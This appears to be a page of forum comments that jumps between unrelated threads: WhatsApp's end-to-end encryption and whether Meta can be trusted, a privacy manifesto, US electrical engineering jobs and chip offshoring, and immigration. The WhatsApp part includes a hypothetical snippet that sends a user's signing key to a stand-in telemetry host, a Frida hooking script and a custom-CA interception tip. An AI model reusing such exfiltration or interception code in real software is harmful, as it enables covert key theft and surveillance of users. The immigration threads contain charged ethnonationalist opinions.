By that standard, it can never be verified because what is running and what is reviewed could be different. Reviewing relevant elements is as meaningful as reviewing all the source code.
Let’s be real: the standard is “Do we trust Meta?”
I don't, and I don't see how trusting them could possibly be considered logical.
I definitely trust a non-profit open source alternative a whole lot more. Perception can be different from reality, but that's what we've got to work with.
What you are saying is empirically false. A change in a single line of executed code (sometimes even a single character!) can be the difference between a secure and an insecure system.
This must mean that you have been paid not to understand these things. Or perhaps you would be punished at work if you internalized reality and spoke up. In either case, I don't think your personal emotional landscape should take precedence over things that have been proven and are trivial to demonstrate.
As long as the client-side encryption has been audited, which to my understanding is the case, it doesn't matter. That is literally the point of encryption: communication across adversarial channels. Unless you think Facebook has broken the laws of mathematics, it's impossible for them to decrypt the content of messages without the users' private keys.
Well, the thing is, the key exfiltration code would probably reside outside the TCB. It's not particularly hard to have some function grab the signing keys and send them to the server. Then you can impersonate the user in a MITM attack. That exfiltration is one-time, and it's quite hard to recover from.
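To illustrate how little code that takes, here is a purely hypothetical sketch (the key-store object, method names, and endpoint are all invented for illustration; nothing here is claimed to exist in any real app):

    import requests  # assumes the app already bundles an HTTP client

    def exfiltrate_signing_key(key_store):
        # Grab the long-term identity/signing keypair from wherever
        # the app keeps it. This lives entirely outside the audited
        # encryption code path.
        key_bytes = key_store.get_identity_keypair().serialize()
        # One request, blended into ordinary telemetry traffic, is
        # enough: the long-term key doesn't change afterwards.
        requests.post("https://telemetry.example.com/upload", data=key_bytes)

An audit of "the encryption" would find nothing wrong, because the leak never touches it.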
I'd much rather not have blind faith in WhatsApp doing the right thing, and instead just use Signal, where I can verify myself that its key management is doing only what it should.
Speculating over the correctness of the E2EE implementation isn't productive anyway; the metadata leak we know Meta takes full advantage of is reason enough to stick with proper platforms like Signal.
> That exfiltration is one-time and it's quite hard to recover from.
Not quite true with Signal's double ratchet though, right? Because keys are routinely getting rolled, you have to continuously exfiltrate the new keys.
No, I said signing keys. If you're doing the MITM all the time, because there's no alternative path to route the ciphertexts, you get to generate all those double-ratchet keys yourself. And then you have a separate ratchet for the other peer in the opposite direction.
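For anyone following along: the symmetric half of the double ratchet is just a KDF chain, roughly like this (a minimal sketch in the spirit of the Signal spec, not its actual implementation):

    import hmac
    import hashlib

    def ratchet_step(chain_key: bytes) -> tuple[bytes, bytes]:
        # Each message advances the chain: one output becomes the
        # message key, the other becomes the next chain key, and the
        # old chain key is discarded.
        message_key = hmac.new(chain_key, b"\x01", hashlib.sha256).digest()
        next_chain_key = hmac.new(chain_key, b"\x02", hashlib.sha256).digest()
        return message_key, next_chain_key

All of these keys ultimately derive from the initial handshake, so a MITM who is there from the start just runs its own ratchets with each peer; the stolen signing keys are what let that handshake go unchallenged.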
Last time I checked, WhatsApp features no fingerprint change warnings by default, so users will not even notice if you MITM them. The attack I described is for situations where the two users have enabled the non-blocking key change warnings and try to compare the fingerprints.
Not saying this attack happens, by any means. Just that it's theoretically possible, and it leaves the smallest trail. Which is why it helps that on Signal you can verify it's not exfiltrating your identity keys.
Ah right, I didn't think about just outright MitMing from the get-go. If WhatsApp doesn't show the user anything about fingerprints, then yeah, that's a real hole.
Not that I trust Facebook or anything, but wouldn't a motivated investigator have been able to find this key exfiltration "function" or code by now? Unless there is some remote code execution flow going on.
WhatsApp performs dynamic code loading from memory, GrapheneOS detects it when you open the app, and blocking this causes the app to crash during startup. So we know that static analysis of the APK is not giving us the whole picture of what actually executes.
This DCL could be fetching some forward_to_NSA() function from a server and registering it to be called on every outgoing message. It would be trivial to hide in tcpdumps. The best approach would be tracing with Frida and looking at syscalls to try to isolate what is actually being loaded, but it is also trivial for apps to detect they are being debugged and conditionally avoid loading the incriminating code. Such code would only run in environments where the interested parties are sure there is no chance of detection. That covers enough of the endpoints that even if you personally can set off the anti-tracing conditions, without falling foul of whatever attestation Meta likely has going on, everyone you text will be participating unknowingly in the dragnet anyway.
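If you want to try anyway, a starting point might look like this (a rough sketch using Frida's Python bindings; note that hooking dlopen only catches native loads, and in-memory DEX loading can bypass it entirely):

    import sys
    import frida

    JS = """
    // Log native library loads. In-memory DEX loading won't pass
    // through dlopen, so you'd also want Java-side hooks, e.g. on
    // InMemoryDexClassLoader.
    Interceptor.attach(Module.findExportByName(null, "dlopen"), {
        onEnter(args) { send("dlopen: " + args[0].readUtf8String()); }
    });
    """

    device = frida.get_usb_device()
    session = device.attach("com.whatsapp")  # attaching is itself detectable
    script = session.create_script(JS)
    script.on("message", lambda message, data: print(message))
    script.load()
    sys.stdin.read()

And per the above, a sufficiently paranoid app can notice the instrumentation and simply behave itself while you're watching.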
"Many forms of dynamic code loading, especially those that use remote sources, violate Google Play policies and may lead to a suspension of your app from Google Play."
I don't know these OSes well enough. Can you MitM the dynamic code loads by adding a CA to the OS's trusted list? I've done this in Python apps because there are only 2 or 3 places where they might check to verify a TLS cert.
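For the Python case, at least, it mostly comes down to pointing the TLS stack at your own CA bundle (standard-library calls; the file path is made up):

    import ssl
    import urllib.request

    # Trust a custom root (e.g. your MitM proxy's CA) for this client only.
    ctx = ssl.create_default_context(cafile="/tmp/proxy-ca.pem")
    urllib.request.urlopen("https://example.com/", context=ctx)

    # Or process-wide, for libraries that honor the usual env vars:
    #   SSL_CERT_FILE=/tmp/proxy-ca.pem  REQUESTS_CA_BUNDLE=/tmp/proxy-ca.pem

Whether that works on Android is another question: apps can ship their own certificate pins and ignore the user CA store entirely.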
>Not that I trust Facebook or anything but wouldn’t a motivated investigator be able to find this key exfiltration “function” or code by now?
Yeah, I'd imagine it would have been found by now. Then again, who knows when they'd add it, and whether some future update removes it. Google isn't scanning every line of every version. I prefer to eliminate this kind of 5D guesswork categorically, and just use FOSS messaging apps.
The issue is what the client app does with the information after it is decrypted. As Snowden remarked after he released his trove, encryption works; it's not like the NSA or anyone else has some super secret decoder ring. The problem is that endpoint security is borderline atrocious and an obvious Achilles' heel: the information has to be decrypted in order to display it to the end user, so that's a much easier attack vector than trying to break the encryption itself.
So the point other commenters are making is that you can verify all you want that the encryption is robust and secure, but that doesn't mean the app can't just send a copy of the info to a server somewhere after it has been decoded.
None of my opinions of this manifesto are positive. This is a defeatist position. It dangerously conditions people to be more casual about their privacy and safety.
There are still legitimate reasons to clear cookies, to turn off Bluetooth/NFC beaconing, and to occasionally rotate passwords (via password managers), as it costs nothing to accomplish and very little in the way of tradeoffs. So... why not?
The probability of a random individual being the target of a sophisticated state sponsored attack is low, but the probability of being caught up in a larger dragnet and for data to be classified, aggregated and profiled is very high. So why not make it just a bit harder for them all?
If anything, let's chip away at this problem bit by bit. Make their life a bit harder...their datacenters a bit hotter. Add random fud to the cookie values, constantly switch VPN endpoints, randomize your mac address on every WiFi association, constantly delete old comments, accounts, create throwaway accounts, create proxies and intermediaries, rotate your password and 2FA -- use any legal means to frustrate any adversarial entities -- commercial or otherwise. They want information? They want your data? Fine, overwhelm them with it. THAT should be the proper modern privacy-focused manifesto. This is utterly bewildering...
...but then I get to the signatories and this nonsense suddenly made all the sense in the world:
> Sincerely, Heather Adkins, VP, Cybersecurity Resilience Officer, Google
> Aimee Cardwell, former CISO UnitedHealthGroup
> Curt Dukes, former NSA IA Director, and Cybersecurity Executive
> Tony Sager, former NSA Executive
Why would (should) they? The tariff is the biggest contributor to the would-be price increase, and they want to offload the blame onto the policies that enacted it.
Why do you think you get a breakdown of governmental fees in your electric or phone bill, but not the tax subsidies?
The 'brain drain' (as you refer to it) stems from intelligent/motivated grads in the US for the last two decades (at least) pursuing more lucrative fields like finance and adtech (re: Google, Facebook). Or some pursue the management route (attending big MBA schools and switching to management roles where they climb the corporate ladder). In other words, there are not a lot of college/grad students who want to pursue traditional engineering routes in the US.
I myself was an electrical engineering (EE) major until I switched to computer science in my third (junior) year of college, because, as a friend of mine at the time told me, "<my name>, if you don't major in computer science, you will not be able to find a job easily after graduation." He was right. All of my former college friends in EE ended up pursuing programming jobs (a few of them now work for FAANG; I used to work for one but left a year ago due to RTO). That is why the US does not have sufficient personnel to do traditional engineering jobs, and we have shipped off a lot of those to foreign countries.
I'm an EE and had no problem finding a job, and neither did any of my classmates in my EE program (early 2010s). I also didn't exactly go to anything approaching MIT, but it was an engineering school and I had a decent GPA. In particular, there are a lot of well paying jobs in power systems with good work life balance. We have an energy transition going on, so that helps. Having an internship probably helped me too. I acknowledge that things might have broadly changed.
> there are a lot of well paying jobs in power systems with good work life balance
How much electrical engineering is there in these jobs? I knew a few electrical engineers at university (weirdly, they outnumbered the software engineers 3 to 1), and some of them told me they could get work at a local power company, but it was mostly looking at spreadsheets and not really using anything that they'd learned.
It depends on what exactly you do as the industry is so vast.
It is true (I'd wager this is true in most engineering fields) that very few actually use a lot of what they learned in school, as it has all been put into fancy software packages. For example, my wife uses some kind of drafting software to design things like roads; she learned all the math needed to understand it in college. It is the same in my industry, where yeah, you use a lot of spreadsheets and Python scripts and SQL to help automate work and analyze the results. In a lot of cases you don't really need an engineering degree, but it helps a lot in understanding what is going on when the results don't make sense. Getting the engineering degree is also just really good training for the kind of rigorous thought processes needed for solving open problems.
There are also plenty of jobs in power that are closer to what you would consider engineering. For example, you might have to go to the substation switch yard, help supervise a crew installing new transformers, help design a microgrid...etc.
I'll add that it is pretty common for engineers to have some kind of existential crisis once you graduate and realize that what you thought you'd be doing (in my case, crawling around Jefferies tubes and fixing the warp reactor) is totally different in the real world. It's kind of similar in computer science, where most graduates are basically just gluing library code together instead of writing their own software from scratch in C. I recall reading somewhere that the famous SICP course moved from Scheme to Python precisely because of this change in how people code now.
> I'll add that it is pretty common for engineers to have some kind of existential crisis once you graduate and realize that what you thought you'd be doing (in my case, crawling around Jefferies tubes and fixing the warp reactor) is totally different in the real world.
Thank you for saying this out loud. It took me years to recover from this, and I "recovered" mostly by giving up and accepting that, unlike fiction, the real world doesn't have to make sense or offer interesting, fulfilling work.
Now I just dream that one of these days, I'll build a house, and I'll design it with a Jefferies tube, just to scratch my itch.
I'm with you there friend! To continue the Star Trek analogies, I think a lot of modern day engineers (mind you not all) are at least partially just business folks, but instead of being Ferengi we have a more Vulcan like mindset and fill a different niche within the business in understanding the technical side of things in a way that few have an aptitude/interest for.
I work a lot with electricity markets, though, and find it to be very interesting and challenging, as the field is surprisingly vast and incredibly dynamic. It requires knowledge of power fundamentals as well as economics, operations research, and, honestly, history. It isn't at all what I thought I would do back when I was in high school, but a pleasant surprise all the same. I do sometimes get the itch to be like the guy who created the Lotus office software, who lived in a cabin in the woods somewhere and implemented his own product, but the software market is already saturated in this space. Also, I have a family now, which prevents my hermit dream, and that is yet another wonderful surprise that has been very fulfilling as well as maddening at times :)
Similar qualifications here, but no internships. Couldn't find anything after grad school in the early 2010s (and still nothing in the mid 2010s after trying again). Went into telecom and I'm a happy little coder now. Nice to actually feel appreciated in this field compared to EE, where it felt like I was always working my butt off for scraps.
I was focused on finding something entry-level. I did a non-thesis master's focused on mixed-signal / RF design, and R&D didn't really appeal to me at the time.
I don't know if there is a somber write-up. But from what I have heard from a lot of people, jobs designing and making, say, PCBs and electronic circuits just don't exist here. They are all in Shenzhen. The American firms that still have American engineers seem to all involve flying to those factories to help fix problems, and those are dead-end jobs. At least that's my impression.
Having known several great EEs in FAANG who did exactly that job, sometimes paying Chinese income tax due to the length of their stays at the factory, that is my impression as well.
Chip design/semiconductors/etc. have been a dead end in the US for 30+ years, but EE is a broad field and other specialties like RF/power systems/anything defense related are still in high demand. An EE with a PE will have an infinitely easier time getting a job working at a utility or engineering firm than any software developer these days to be honest.
Limited to non-existent jobs. Not much else to say; the jobs, like so many others, have been exported. Taiwan and China being the electronics and manufacturing centers means design has steadily moved as well. Ask any board house in the West how things are going; the ones that are left, that is.
It would help if they didn't charge $50 for a single raw PCB in low quantity when I can have the same board not just made, but also assembled in China for a fraction of that, shipping included. Literally.
I've often wondered if that's some kind of industry inertia issue, or if there's some underlying additional cost to build in the US.
People here cost a little more. No one here does anything like the volume JLCPCB likely does. Perhaps there's some artificial market factor as well; the CCP tends to weigh some scales. There are board assembly machines made in China as well, likely further reducing the cost to build out assembly lines. Perhaps cheaper sources of basic materials like copper.
Likely a multitude of factors at play, all of them in favor of China.
I could buy that to some degree, but not to the current insane level of price disparity.
PCB production should be one of those things that is or can be mostly automated if it isn't already. Assembly is definitely already a mostly automated process. This is all existing tech. Thus the cost differential doesn't seem justifiable.
I have to think that this is very much "build it and they will come" territory if you can get within 1.5x to 3x the price, so it continues to boggle my mind that nobody has managed to make it happen.
The only blocker I can truly identify is the magnitude of the initial investment. That doesn't explain why the prices at domestic board houses seem to have remained pretty much exactly the same for the last couple of decades, though.
As far as I can tell, they just don't want the business.
The personnel who swap part dispenser blades in the USA cost more. What's there to understand?
Automated assembly still has setup costs that take real humans walking around physically.
It's more likely that the Chinese companies are offering prototyping at a loss, because they know people won't switch to a different board house, once the prototyping phase is over.
Software jobs are more plentiful, sure, but you're discounting the extremely high number of EE/CE jobs available at semiconductor companies (Intel, AMD, and many smaller ones) and companies like Apple. They don't pay as well, but they can pay quite well over time and tend to be more stable than software jobs.
It's not even brain drain, America's dominance came from the fact that for nearly a century the brightest people in the world were willing to give up everything to come here. That is no longer the case. Today's Einstein probably isn't going to immigrate here.
I just want to point out that Germany and the US have a similar number when adjusted for their respective population sizes (I think Germany's is even a little bit higher).
Exactly. Something is penalizing or inhibiting manufacturing in developed countries. That something is just the regular progression up the ladder of the classical, infinitely extending three-sector model[1] and the gradual obsolescence of its lower rungs. But that is problematic: without healthy preceding sectors underneath each rung, it's just a measuring contest held mid-skydive.
Einstein didn't emigrate to get rich; he emigrated because the Nazis took over Germany. Germany had the best universities in the world before it took the path of self-destruction. So that was a second, separate event that helped America.
Well, hopefully nothing like that happens in the US - that is to say an ideologue that ruins a country by ostracizing and then removing skilled immigrants or deters them from coming in the first place. Perhaps we can examine some recent large scale survey data to determine if the US populace gives a shit.
For all I shit relentlessly on this country and its culture, it's still an extremely attractive place to live if you're well-situated to make money. (Most people are not—hence my contempt for how the society functions. This presumably DOES apply to an "Einstein", if indeed this Einstein wants money.) China still has a way to go in catering to and granting citizenship (or some amenable equivalent) to foreigners.
You have the metaphor backwards. Where do you go if you're a talented American and your own country continually does not want to pay for your talent? It's the brain drain out of the US to worry about, not the influx of immigration.
> Where do you go if you're a talented American and your own country continually does not want to pay for your talent?
China is the only country that pays even remotely competitively. Yes, even counting all the nice benefits of living in a European welfare state; yes, even counting the other Anglo colonies.
Makes sense; it's just basic economics that you pay for talent and get it. Something the US is continually giving up.
Still, their culture basically does make it so certain types of people simply can't exist there. And I hear there's a healthy dose of racism as well. Nothing unique to China, sadly.
You make a good point about China. It’s still an ethnostate, and I don’t see how it can reconcile such a strong ethnic nationalist identity with its own demographic crisis and competition for labor from abroad.
The US didn't win World War 2, break the sound barrier, or put a man on the Moon only or primarily due to immigrant workers. We scoured the country's public school system for the sharpest young minds, sent them to institutions of higher learning with rigorous curricula, and found them positions in industry, government, or the military which made good use of their talent. Fetishizing the "nation of immigrants" narrative at the expense of the native-born Americans who actually built most of this country's prosperity is, at best, ahistorical.
We literally put a man on the Moon because we acquired Wernher von Braun and used his plans... I mean, we probably would have done it eventually, but the timeline likely would have been different and the Soviets might have beaten us to the Moon. In the timeline we are in, we had a space program as successful as it was because we acquired German scientists who had already been thinking about these problems for a decade or more before we started to invest in it.
1,200 men of the same ethnic and religious background as the median American, brought over in a one-time arrangement in the wake of the most destructive war ever fought, versus 100,000 Indian H1B visas granted annually. That's just India, not counting other countries or visa types. Okay. Sure. Totally the same. We couldn't have made it back to the Moon without a million indentured IT workers.
I really have no clue what you're trying to say. You presented landing on the Moon as a historical example for your argument. I showed how that was a flawed example, and now you're talking about people from India in IT and an accomplishment of the Artemis program that hasn't even happened yet. It looks like you're trying to pick an argument about H1B visas with my comment, which made no mention of them.
>Fetishizing the "nation of immigrants" narrative at the expense of the native-born Americans who actually built most of this country's prosperity is, at best, ahistorical.
Except many of us can trace our family lines to immigration. On one side I have to go back to the early 1800s to see when they immigrated, but this is literally a country of immigrants. (The other half of the family is late 1800s / early 1900s immigration.)
Even today I would assume the average American doesn't have to trace back more than 100-150 years to see when part of their family moved here.
>We scoured the country's public school system for the sharpest young minds, sent them to institutions of higher learning with rigorous curricula, and found them positions in industry, government, or the military which made good use of their talent.
Don't even get us started on ahistorical nonsense when you just want to make things up. Not when talented folks[0] had to work through a system that didn't want them so they could eventually make all the difference.
I hear you; I took umbrage at that comment as well. But I think it's fair to consider whether we are doing enough for Americans even as we welcome newcomers to settle here. My experience as a native-born Californian, raised by a single immigrant mother living in urban poverty, says no, we do not. Granted, I escaped poverty by self-funding my engineering education (federal loans and working full time), but it took the better part of my 20s to do so, at great personal cost and risk. In many ways that experience taught me just how unfairly stacked the odds are against the working poor, let alone their children.
I am really curious how welcoming you think the US is to newcomers. Most of the early immigrants in the 1800s and early 1900s were blue-collar workers (exactly like the people coming from south of the border). Do you think there is any part of the system that is welcoming to them?
The brain drain from the rest of the world to the US started only after WW2, when the US became the only industrialized country with a viable student -> employee -> citizen path, and even that only works for a very small set of people.
I would love to hear about programs where the newcomers are treated better than you as a native citizen when both of you are equally qualified.
Our German scientists were better than their German scientists. We had no real science PhD programs until the 1920s. We had no scouting for young minds until the 1950s.
> Fetishizing the "nation of immigrants" narrative at the expense of the native-born Americans who actually built most of this country's prosperity is, at best, ahistorical.
Most of those native-born Americans were the children or grandchildren of immigrants.
What do you think a nation is? Is it a sports team or economic zone that hands out name tags to whoever steps off the boat with the right attitude? Or is it a specific group of people in a specific place with a shared language, lineage, culture, history, faith, and common destiny? I submit to you that it's the latter, and no empire nor state organized as the former can endure.
> Or is it a specific group of people in a specific place with a shared language, lineage, culture, history, faith, and common destiny?
I'm American, so I've never lived in this kind of nation.
> no empire nor state organized as the former can endure.
Looking at many of the longer-lived nations and empires of the past: a shared language, lineage, culture, history, faith, common destiny? They had none of those. They were conglomerations of people speaking different languages, from different lineages, with different cultures, different histories, and practicing different faiths.
The USSR never did pay us back for the massive, unprecedented, war-winning aid we delivered to them under Lend-Lease. Half a million trucks, thousands of tanks, tens of thousands of airplanes, millions of tons of food. And what did we get out of it? An implacable evil empire that sat like a boot on the neck of Eastern Europe for another 50 years after our "victory."
A total of $50.1 billion (equivalent to $672 billion in 2023 when accounting for inflation) worth of supplies was shipped, or 17% of the total war expenditures of the U.S.
In all, $31.4 billion went to the United Kingdom, $11.3 billion to the Soviet Union, $3.2 billion to France, $1.6 billion to China, and the remaining $2.6 billion to other Allies.
Material delivered under the act was supplied at no cost, to be used until returned or destroyed.
In practice, most equipment was destroyed, although some hardware (such as ships) was returned after the war.
Supplies that arrived after the termination date were sold to the United Kingdom at a large discount for £1.075 billion, using long-term loans from the United States, which were finally repaid in 2006.
Similarly, the Soviet Union repaid $722 million in 1971, with the remainder of the debt written off.
This is all correct. It's also hard to believe that any other country could have sustained the casualties the USSR took, and the Eastern Front saved lives for the other Allies by diverting German troops. The US had nearly 500k deaths; the USSR (post-war borders) had something like 26 million.
Both sides needed each other. From a US perspective, trading money for lives likely seemed worth it.
The USSR was an objectively terrible regime, and most of the Russian governments that have followed on from it have been too. Underestimating the deaths Russian leadership is willing to tolerate has proven unwise a few too many times.
If you only came across ten thousand years ago, you are just a colonist who killed and displaced the people who came across sixteen thousand years ago. But that said, native-born has a definition, and it is where you were born, not where your parents, grandparents, or grand^14 parents were born.
My grand^10 parents didn't exactly "immigrate" here per se. They were "invited". I guess they were "persuaded" to help fight the occasional war, though.
It is kind of disingenuous and dishonest to say that there is no value or meaning in those Americans born on American soil. A nation should prioritize the people that live in it, or at least care for them and make them useful for nation-building in the future.
Canada has proven that importing Punjabis for almost two decades and ignoring the local people is not effective. So yeah, there is a meaningful difference, and saying "native born" in this context allows us to steer the conversation toward taking care of those already in the country, which is something that neolib governments have not done in the last decades.
I say this as a person who was not born in the country he resides in now, but saying "calling yourself 'native born' doesn't mean a thing" is a dishonest way to try to dissuade and delete necessary words that work toward more fruitful conversations about how to improve the systems in North America.
>Canada has proven that importing Punjabis for almost two decades and ignoring the local people is not effective.
Curious, that's what Americans once said about the Irish and the Italians and the Germans and the French and the Poles and the Chinese and Jews and Catholics and Muslims and so on and on ad nauseum.
It's just a generational crab mentality born from xenophobia. Every new wave of immigrants decides they're "native" as soon as the next wave shows up. None of them are any more native than the others.
This type of solipsistic kumbaya slop is running face-first into reality, fast. People are different. Groups of people are different. Nations of people can be very different. They differ in meaningful and important and obvious ways. You'll live to see these differences continue to manifest in ways that will doubtless surprise you.
And the Ellis Islanders were at least mostly Christian, white, European. They shared a common cultural, historical, religious, and racial frame with native-born Americans. They could and did meaningfully assimilate. Despite this, that wave of migrants almost broke us. Anarchy, terrorism, riots, organized crime, et cetera. The Johnson-Reed Act was passed in response in 1924 and it slowed immigration to a crawl until the 1960s.
Today we have immigrants who speak utterly alien tongues, with no shared history or civilized tradition, arriving at breakneck pace, and who barely learn English because they can scrape by with apps and translation services, who stay in the cultural bubble of their country of origin, who don't see an American culture worth assimilating to. Especially among so-called high skill immigrants, they pick up a US passport and immediately see me as a worse or lesser "American" than they are. That's nuts. The melting pot, if one ever existed, has broken down. What's happening now is something quite different, and it's not good for me or my fellow Americans.
It seems like you have misread my comment and think I have a particular thing against any group of people.
That is simply not the intention of the comment. If you read it correctly, you will note that what I meant is that you need to take care of your own people, something that the United States ACCOMPLISHED from the fifties until before Reagan.
I am just no more native than an Indian or Italian person who, just like me, came a few decades ago. However, to pretend there is no difference between me and someone whose family has been here for decades or centuries... that is dishonest.
Why do you call it xenophobia to prioritize giving good jobs to the local population? It seems like your reading comprehension, as well as your definition of xenophobia, is deeply, deeply flawed. We can have immigration that makes sense. Like what Canada used to have...
We should prioritize those that have been in a country for decades and those whose families have paid taxes for multiple generations; there is absolutely nothing xenophobic about that.
If you want to pick an era of technological progress to make that point, maybe don't pick the one where America becomes a superpower by putting a bomb invented by Jewish refugees on a rocket built by ex-Nazi scientists, after a physics revolution where we basically got to go and take all of Germany's top talent, lol.
Alternate explanation: electrical engineering is actually really hard, and some parts of computer science look comparatively easier. Plus, coding in startups is cool; EE is still nerd as in Nerd.
Well yes, that's why China's in the lead. We willingly gave it up because corporate decided it was too expensive to pay American talent. They started the death spiral toward "No American wants to work in EE anymore".
I disagree. From what I've seen, the lower level you go, the more advanced it is seen by other developers. As the copypasta goes:
At the beginning, there was Purusha. From his face, born was the Brahmin, the priestly caste, the tooling creator, one who develops programming languages, compilers and standard libraries.
From the arms of the Purusha, Kshatriya, the warrior caste, was born. Kshatriya is the developer of systems software; operating systems, database engines, graphics drivers and high performance networked servers.
Then comes the Vaishya, the merchant caste, the Application developer, who was born from the knees of Purusha. From the feet of Purusha, the fourth varnā, Shudrā, the system administrator, was born. Shudrā serves the above three Varnās, his works range from administrating computers in bureaucratic organizations to replying to support requests.
That's by other developers, but I think in the mainstream know-nothing culture, people have an image of "coding" that's more prestigious and hackery than EE?
Hard and well-paid gets a flood of people pursuing it, so difficulty can't be the only explanation. Finance, actuarial science, medicine, and law get plenty of applicants. I think it's that CS is an office job that pays well and is in demand.
I studied both and can't say for sure EE was harder. Some courses in computer science were extremely hard for me (complexity, discrete math), and some courses in EE were equally hard (most of the physics courses, analog circuits, and more).
Both degrees can be made super hard, as hard as the school desires them to be...
Nah, I did EE and then CompE (which was just replacing some later EE classes with hardware design stuff), and EE is not "actually really hard", although people like to put it on a pedestal.
I never studied the hard sciences very seriously, although in retrospect I feel like I could have done so, at much lesser proficiency than someone with much more encouragement, discipline, and interest. So my path of starting with web/software and then diving into electronics and EE would feel quite different.
Hit the nail on the head. I went to the College of Nanoscale Science and Engineering in Albany for a master's in "nanoscale engineering", which essentially boiled down to a master's in being a fab line manager. I finished the degree, since it was only a 3-semester program and I was getting paid for research work, but almost immediately after chatting with alums who went to work at IBM/Intel/etc., it was pretty clear that software engineering was a much more lucrative and less stressful career.
Definitely true, as there weren't EE jobs here. Now that we're moving chip manufacturing back, and with the programming job market being saturated, perhaps it will shift and EE will pay more due to being more in demand.
The jobs needed for chip manufacturing aren’t primarily EE. It’s largely chemical engineering with specializations related to semiconductor tech. EEs use the tools developed by fabs to make their products, but those are typically separate companies (or, in the case of in-house fabs like Intel, basically run as separate companies).
I suspect the kinds of salaries that are possible in Silicon Valley only happen because:
(A) Skills are fairly transferable.
(B) There are a lot of employers competing for workers.
(C) An awful lot of value is created along the way.
If you specialize in some tiny part of chip manufacturing, there aren't many places you can transfer your skills.
Even if, in the future, you have multiple chip vendors, they won't all use the same processes, and you might only fit into one role at each of these businesses.
Maybe it's not that simple. But few chip companies have to compete against startups for workers. And that probably won't change.
Not saying the jobs can't be well paid, just that they quite possibly won't be absurd SV-level salaries.
> Maybe it's not that simple. But few chip companies have to compete against startups for workers. And that probably won't change.
It seems like what EE needs is something similar to open source, so that does happen.
The way things like Google or AWS got started is they started with Linux and built something on top of it, so it could be a startup because they don't first have to build the world in order to make a contribution, and they're not building on top of someone else's land.
There isn't any reason that couldn't inherently work in EE. Get some universities or government grants to publish a fully-open spec for some processors that could be fabbed by TSMC or Intel. Not as good as the state of the art, but half as good anyway.
Now people have a basis for EE startups. You take the base design and tweak it some for the application, so that it's a startup-sized job instead of a multinational-sized job, and now you've got EE startups making all kinds of phone SoCs and NVMe drives and Raspberry Pi competitors and whatever else they think can justify a big enough production run to send it to a fab and sell it to the public.
An interesting license for this could be something along the lines of: you can make derivative works, but you have to release them under the same license within five years. In other words, you get five years to make money from this before it goes into the commons, which gives you the incentive to do it while keeping the commons rich, so the next person can do the same tomorrow.
The startup costs are probably astronomically higher for a startup doing custom chips. Even if you're fabless.
There are probably also a lot fewer customers.
There is no shortage of businesses and private people who need a CRUD app to track something. We probably won't run out anytime soon :)
And even then, there is probably also a long list of factories that would like to automate something using robots and software.
How many use cases for custom SoCs are there, really?
It's a lot cheaper to customize the software, than it is to customize the hardware. Which is kind of the point.
RISC-V is the ISA, which is a solid first step. What you need is a production-ready fully open source whole device, so that someone who wants to fork it only has to change the parts they need to be different instead of having to also re-engineer the missing components.
I think your explanation about large numbers of motivated students pursuing lucrative Non-STEM degrees is incomplete without mentioning the cost of an undergraduate and graduate STEM education in the USA.
The most critical shortages of STEM graduates are in roles requiring advanced degrees. Your median undergraduate education (~$40k) and median graduate education (~$60k) saddle students with approximately $100k in unforgivable student debt! Never mind the years lost during which one could otherwise be working. So it's no wonder students are motivated by the ROI of their degrees; it's why I chose Computer Engineering over Electrical Engineering.
These are expensive STEM degrees which students on visas are all too willing to pay for, for a chance at residency and a pathway to citizenship. So it's no wonder the majority of undergraduate and graduate STEM students in the US are foreign-born; for domestic students, the ROI is not worth the debt. We don't have enough need-based scholarships available to finance the STEM graduates this country claims it needs.
> I myself was an electrical engineering (EE) major until I switched to computer science in my third (junior) year of college, because, as a friend of mine at the time told me, "<my name>, if you don't major in computer science, you will not be able to find a job easily after graduation." He was right. All of my former college friends in EE ended up pursuing programming jobs (a few of them now work for FAANG; I used to work for one but left a year ago due to RTO).
Nothing against you looking out for your future, but this is exactly what I describe to people when I say the industry has changed. It used to be nerds who were very passionate. Now it’s full of people who are just doing a job.
My hot take as to the reason EE is a bit of a dead end in the US is that the options outside of the handful of primary employers are limited. It is very capital intensive to run a semiconductor fab, design chips or assemble electronics at scale. Therefore the employer has all of the leverage. The equipment and/or factory worker infrastructure comes first and the engineering teams are just a cog.
Compare that to having all the degrees of freedom as a computer science student to start up a niche mobile app or niche internet-based service after working at FAANG for 5-6 years. Even AI infrastructure will eventually go down in price, making niche AI-first startups a possibility. In finance it's the same: as a post-i-banker you have the option to start a boutique fund, a niche fintech, or just invest your own savings.
Really appreciate this comment and perspective! It fits the larger context of immigration and brain drain in other countries: the US also has one, but of a different kind. Ultimately, it's a loss of potential. I'd somewhat disagree with the directionality of the correlative/causal relation, though. What can be said is that the US also experiences a knowledge drain toward plainly lucrative jobs. I'd wager that it was/is a cyclical effect that just worsened over the decades, and that neither engineers moving to fintech nor low-paying engineering jobs were/are the sole reason.
What you said seems contradictory. You open with the premise that intelligent youth go the finance / CS / MBA path instead of engineering and then say that those who do go into traditional engineering can’t find jobs. Couldn’t it be that people don’t go into engineering because there aren’t any jobs? Wouldn’t the lack of jobs explain the low salaries and thus the preference for more high paying alternatives?
I read the main problem with hiring chip factory workers in Arizona was that the factory just didn't pay enough for the long hours demanded. I looked up the median salary and it's only 50k, so I'm assuming it's not crazy-skilled labor (i.e., not brain drain). Taiwanese workers just seem more willing to do it.
I spoke to a Taiwanese person, and apparently the salaries there are actually quite good, even by Western standards (normal ones, not SF). The downside is they have very, very long hours (996, barely any holiday, etc.).
It's also highly-skilled, yet very boring work. The way it was described to me is that every major piece of equipment has a PhD assigned to it and their job is basically to babysit the machine and troubleshoot when things go wrong.
US PhDs typically have other options and would consider this sort of work a waste of their time.
I know several people working as customer engineers in a fab based in America. They are very much not PhDs, or even mechanical engineers.
They are each assigned one tool to maintain, as you said. They each make around $100K for three 12-hour days per week.
They were working in the automotive industry before these jobs. Sounds pretty damn good to me, but I suppose that's one reason American companies cannot compete with TSMC.
> every major piece of equipment has a PhD assigned to it and their job is basically to babysit the machine and troubleshoot when things go wrong
This works in Taiwan. It doesn’t in America. The Taiwanese workers will help transfer knowledge to American workers; it will be the joint responsibility of them both to come up with how those processes are adapted for American preferences. (Probably more automation, rotation between machines or possibly even not being under TSMC.)
I mean, that was exactly the way the job was described when I interviewed at Intel for a process engineer role, and everyone doing that job was at the time a PhD, according to the interviewer. Did it change?
Being on call 24/7 to troubleshoot million dollar pieces of equipment sounded like a poor life choice, so I didn't take it. But Intel also hasn't exactly done great since then...
> was exactly the way the job was described when I interviewed at Intel for a process engineer, and everyone doing the same job was at the time a PhD according to the interviewer. Did it change?
Not sure. What has changed in recent years is the quality of industrial automation, particularly in semiconductors.
